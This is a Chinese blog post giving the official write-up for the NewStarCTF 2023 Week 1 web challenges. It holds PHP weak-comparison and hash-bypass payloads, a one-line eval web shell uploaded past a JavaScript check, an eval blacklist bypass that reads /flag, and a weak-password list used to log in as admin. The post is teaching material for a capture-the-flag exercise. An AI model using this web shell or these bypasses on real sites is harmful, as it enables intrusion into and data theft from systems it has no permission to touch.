NewStarCTF 2023 Week1 web官方wp

最新推荐文章于 2023-11-05 11:11:13 发布
最新推荐文章于 2023-11-05 11:11:13 发布
阅读量600 收藏
点赞数 2
文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63641882/article/details/133547307
版权

ErrorFlask

进入题目首先要求以GET方式传参:

http://ec7fe482-428e-4978-8b2c-4016472b07a7.node4.buuoj.cn:81/index.php?ctf=ok

  • 考点:Flask报错界面信息泄露
  • FLAG:动态FLAG
  • 解题步骤提示输入number1和number2,我们随便给其中一个传入数组就会发现      成功获取flag

    Begin of HTTP

  • 考点:HTTP常见请求头、HTTP请求方式
  • FLAG:动态FLAG
  • 解题步骤

接着要求以POST方式传递secret参数,并且secret参数的值是固定的:                      右键查看页面源代码可以看到base64编码后的secret值:             base64解码得到

n3wst4rCTF2023g00000d                         

 使用HackBar发送secret:              添加X-Real-IP头,值为127.0.0.1,获得Flag:

Begin of PHP

  • 考点:PHP弱类型、PHP加密函数数组绕过、PHP函数特性、变量覆盖漏洞
  • FLAG:动态FLAG
  • 解题步骤

    题目分为五个关卡。第一关主要考察PHP中md5弱类型比较的特点,只需要找到两个值不同但md5值以0e开头的字符串即可通过本关,原理是0e在进行弱类型比较时会被当作科学计数法进行比较。

    if(isset($_GET['key1']) && isset($_GET['key2'])){
    echo "=Level 1=<br>";
    if($_GET['key1'] !== $_GET['key2'] && md5($_GET['key1']) == md5($_GET['key2'])){
        $flag1 = True;
    }else{
        die("nope,this is level 1");
    }
}

    构造Payload如下:key1=QNKCDZO&key2=240610708

第二关主要考察PHP哈希函数的特性,在处理数组类型的传参时,md5、sha1等哈希函数会返回NULL值,由此可以构造出NULL===NULL从而通过判断。

if($flag1){
    echo "=Level 2=<br>";
    if(isset($_POST['key3'])){
        if(md5($_POST['key3']) === sha1($_POST['key3'])){
            $flag2 = True;
        }
    }else{
        die("nope,this is level 2");
    }
}

构造Payload如下:

key1=QNKCDZO&key2=240610708
POST-DATA: key3[]=1

第三关主要考察strcmp函数特性,如果传入的参数为数组类型,该函数就会返回NULL值,构造NULL==0从而通过判断

if($flag2){
    echo "=Level 3=<br>";
    if(isset($_GET['key4'])){
        if(strcmp($_GET['key4'],file_get_contents("/flag")) == 0){
            $flag3 = True;
        }else{
            die("nope,this is level 3");
        }
    }
}

构造Payload如下:

key1=QNKCDZO&key2=240610708&key4[]=2
POST-DATA: key3[]=1

第四关主要考察is_numeric函数特性,在传入的数字后加入任意字母即可通过本层的判断。

if($flag3){
    echo "=Level 4=<br>";
    if(isset($_GET['key5'])){
        if(!is_numeric($_GET['key5']) && $_GET['key5'] > 2023){
            $flag4 = True;
        }else{
            die("nope,this is level 4");
        }
    }
}

构造Payload如下:

key1=QNKCDZO&key2=240610708&key4[]=2&key5=2024a
POST-DATA: key3[]=1

第五关考察extract函数导致的变量覆盖漏洞,这里的if判断只要保证传入变量flag5即可,根据上面的正则限制,变量值不能为字母和数字,那么传入一个任意符号即可通过本层。

if($flag4){
    echo "=Level 5=<br>";
    extract($_POST);
    foreach($_POST as $var){
        if(preg_match("/[a-zA-Z0-9]/",$var)){
            die("nope,this is level 5");
        }
    }
    if($flag5){
        echo file_get_contents("/flag");
    }else{
        die("nope,this is level 5");
    }
}

构造Payload如下:

key1=QNKCDZO&key2=240610708&key4[]=2&key5=2024a
POST-DATA: key3[]=1&flag5=?

Begin of Upload

  • 考点:PHP文件上传漏洞
  • FLAG:动态FLAG
  • 解题步骤

本题主要考察PHP文件上传漏洞的前端校验绕过

编写含有一句话木马的文件命名为1.php内容为

<?php
@eval($_POST['1']);
echo "it is ok";?>

点击上传文件,会弹出

想到题目是使用JavaScript对文件拓展名进行限制

打开浏览器设置禁用js              再次上传,得到上传文件的路径

访问路径 url/upload/1.php

然后命令执行得到flag

泄漏的秘密

  • 考点:敏感文件泄漏
  • FLAG:flag{r0bots_1s_s0_us3ful_4nd_www.zip_1s_s0_d4ng3rous}
  • 解题步骤

本题主要考察敏感文件泄漏,robots.txt文件中可以获得第一段Flag:      www.zip备份文件存在泄漏,index.php的变量中可以获得第二部分Flag:

R!C!E!

  • 考点:md5碰撞、PHP特殊符号传参、PHP命令执行、黑名单绕过
  • FLAG:动态FLAG
  • 解题步骤

首先题目要求 POST 传入一个 password ,password 的 hash 前六位为 c4d038,而哈希加密是一种不可破解的算法,我们只能通过碰撞来尝试获取我们需要的 password。

substr($password,0,6)==="c4d038"

可以写一个简单的 python 脚本来进行碰撞,先尝试简单的数字组合,看是否有符合条件的值

import hashlib

def crack(pre):
    for i in range(0, 999999):
       if (hashlib.md5(str(i).encode("UTF-8")).hexdigest())[0:6] == str(pre):
          print(i)
          break

crack("c4d038")

运行结果是114514,得到了密码。

再看下一个传参,可以发现这个变量名有下划线也有点。

$code=$_POST['e_v.a.l'];

这时候如果直接按这个变量名来传参,php 是无法接收到这个值的,具体原因是 php 会自动把一些不合法的字符转化为下划线(注:php8以下),比如这个点就会被转换为下划线,另外这种转换只会发生一次。故直接传相当于传的变量名为 e_v_a.l 。具体转换可以参考下图:

于是为了防止我们的点被自动转换,我们可以先让第一个下划线位置为不合法字符,从而转换为下划线,不会再转换后面的点。比如可以传入 e[v.a.l 。

最后看命令执行部分,这里是有一个黑名单的过滤:

if(!preg_match("/flag|system|pass|cat|ls/i",$code)){
            eval($code);
}

可以看到是禁止了 system 函数,可以采用 php 自带的函数来达到一样的效果,先使用 scandir 看一下目录,注意 scandir 是不会回显输出的,记得加上 var_dump。

e[v.a.l=var_dump(scandir('/'));

看到了 flag 在根目录下。但是黑名单过滤了 flag 关键字,我们没法直接读取,于是可以使用参数逃逸绕过限制:

POST:password=114514&e[v.a.l=var_dump(file_get_contents($_POST['a']));&a=/flag

获得flag

EasyLogin

  • 考点:弱口令登录、HTTP 302 跳转抓包
  • FLAG:动态FLAG
  • 解题步骤

进入之后是一个登录界面,先随便注册一个账号登进去看看。

CtrlCCtrlD回到 Shell,简单看了下目录结构没有什么东西,只告知了含有一个 admin 用户,按方向上键可以查询Bash历史记录。

发现 Hint,得知 admin 的密码为弱密码加上newstarnewstar2023后其中的一个。

CtrlD或者输入exit后回车回到登录界面。

试一下newstarnewstar2023,没登进去,在网上随便搜弱密码,试一些常见的,试出来是qwe123,不同的靶机密码可能不一样。

提示:题目采用的弱密码表

123456789
password
newstar
newstar2023
123qwe
qwe123
qwertyuiop
asdfghjkl
zxcvbnm
admin123
admin888
111111
000000

查询历史记录只提示了使用BurpSuite,尝试抓包。

使用BurpSuite拦截、开启代理,重新完成一次登录,发现一个/passport的 302 跳转,查看它的响应获取 flag.

回锅肉#
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
NewStarCTF 2023 公开赛道 Week1(1),View的这些基础知识你必须要知道
04-08 781
c = pow(m,e,n) print(n) print©使用风二西(风大)的轩禹RSA工具分解模数N,然后计算私钥,计算明文,明文转字符即可获得flag from secret import flag from Crypto.Util.number import *p = getPrime(1024) q = getPrime(1024)d = getPrime(32) e = inverse(d, (p-1)*(q-1)) n = p*q m = bytes_to_long(flag)c = po
[wp]NewStarCTF 2023 WEEK1|WEB
m0_63138919的博客
09-30 2087
本文为NewStarCTF 2023 web 的解题思路过程解法
2023NewStar】#Week1 Web和Crypto 全题解!涉及知识扩展~
jayq1的博客
10-02 1381
本篇文章在web方面属于中规中矩的解法,师傅们看着玩叭,在crypto方面是有一些知识扩展的,包括仿射密码、连分数等~
NewStarCTF 2023 Week1 Mise 官方wp
m0_63641882的博客
10-04 207
Base64解码得到提示:I like six-digit numbers because they are very concise and easy to remember.使用SilentEye工具进行Decode即可获得Flag。红框部分的字节修改为。WhiteSpace语言,可以在。Base64解码两次得到Flag。
BUUCTF-NewStarCTF 2023-WEB
m0_74317362的博客
09-25 279
题目中提示了ssti,我们利用ssti的句式让页面显示错误。提示传参number1和number2。要求上传图片,那我们直接上传图片马。改文件后缀为.php。
吴恩达 机器学习 每周总结官方week1-week10 适合打印复习,和课上的讲义不同,这个更精准一点。适合打印
03-29
吴恩达 机器学习 每周总结官方week1-week10 适合打印复习,和课上的讲义不同,这个更精准一点。适合打印。 我就是听完他的全部课程后,用这个打印纸制版,进行的复习。系统全面。
web week one
01-20
web week one 任务 1.安装phpstudy,python,JAVA(jdk8)并配置好相关的环境,安装常用工具burpsuit,kali等; 2.学习HTTP协议(请求与响应),学习利用burpsuite 实现简单的抓包改包; 3.掌握PHP的基本语法、数据...
xdoj-week1-题解
05-12
xdoj 2018 第一周训练赛题解。 题面:http://acm.xidian.edu.cn/contest.php?cid=1040
cs50web:webdev week.1
03-29
cs50web:webdev week.1
Algorithm Part2 Week1 Assigment
11-22
Algorithm Part2 Week1 的作业,是关于两个单词相似度的计算,运用图论中广搜的思想解决。代码很详细,看了就知道,而且附有测试用例。
NewStarCTF 公开赛-web
qq_61768489的博客
11-22 1899
cookie 修改admin 源码发现key GET和POST传参即可。
CTF之旅WEB篇(4)--NewStarCTF 公开赛IncludeOne详解
shutTD的博客
10-02 767
主要还是考察对新东西的快速理解,还有一些其他的绕过技巧,平时要养成边刷题边把题目里的一些技巧记录下来的好习惯,这样在其他的题目里的绕过才会更得心应手。
NewStarCTF 2023 公开赛道 Web
最新发布
m0_73728268的博客
11-05 2636
泄露的秘密,直接看常见的目录robots.txt,www.zip直接那道两段flag也可以用dirsearch工具扫描,但是BUUOJ平台的网站只能开底线程,不然全是429。
NewStarCTF 公开赛赛道
shinygod的博客
10-06 1893
基础练习
buuctf Begin of PHP
wp568的博客
09-30 233
is_numeric($num)函数绕过。
NewStarCTF 公开赛赛道 第二周学习记录
m0_64815693的博客
10-03 2347
NewStarCTF 公开赛赛道 第二周学习记录
2023 NewStarCTF --- wp
3tefanie丶zhou的博客
10-09 3292
【活着得,怎么就轻松惬意了,无需愧疚。】
BUUCTF NewStarCTF 2023 WEBWP
qq_65165505的博客
10-07 2481
NewStarCTF 2023 公开赛道 web题目wp
wp如何使用zotero
09-25
Zotero是一个用于管理学术文献和参考资料的工具,它可以帮助用户收集、整理和引用各种类型的文献。要使用Zotero,您可以按照以下步骤进行操作: 1. 首先,您需要在您的计算机上安装Zotero软件。您可以从Zotero官方网站(https://www.zotero.org/)下载并安装适用于您的操作系统的版本。 2. 安装完成后,打开Zotero软件,并创建一个新的“库”来管理您的文献和参考资料。您可以在“库”中创建不同的文件夹来组织您的文献。 3. 接下来,您可以通过多种方式向Zotero中添加文献。一种常用的方法是通过导入现有文献文件。您可以将PDF、DOC、PPT等文件直接拖放到Zotero的界面中,或者使用菜单中的“文件-导入”功能来添加文献。 4. Zotero还提供了浏览器插件,可以方便地保存在线文献。您可以在官方网站上找到适用于您所使用的浏览器的插件,并进行安装。安装完成后,在浏览器中打开一篇您感兴趣的文献页面,点击插件按钮即可将其保存到Zotero中。 5. 在Zotero中,您可以对文献进行标注、添加标签、创建笔记等操作,以便更好地管理和查找。 6. 当您需要引用一篇文献时,可以使用Zotero提供的插件或导出功能来生成符合要求的引用格式。 请注意,以上只是使用Zotero的基本操作步骤,Zotero还有很多其他强大的功能,例如与Microsoft Word等软件的集成、协作等。您可以在官方网站上查找更多详细的教程和帮助文档。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值